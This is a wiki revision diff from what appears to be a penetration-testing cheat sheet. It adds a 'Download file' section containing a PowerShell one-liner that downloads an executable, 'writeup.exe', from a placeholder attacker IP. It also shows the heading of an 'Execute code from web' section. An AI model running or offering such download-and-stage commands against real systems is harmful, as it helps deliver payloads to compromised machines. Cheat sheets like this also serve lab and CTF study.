Changes

Jump to navigation Jump to search
171 bytes added ,  11:41, 16 January 2020
m
no edit summary
Line 1: Line 1:  +
== Download file ==
 +
<syntaxhighlight lang="dos">
 +
powershell "(new-object System.Net.WebClient).Downloadfile('http://<IP>/writeup.exe', 'writeup.exe')"
 +
</syntaxhighlight>
 +
 
==Execute code from web==
 
==Execute code from web==
 
<syntaxhighlight lang="powershell">
 
<syntaxhighlight lang="powershell">

Navigation menu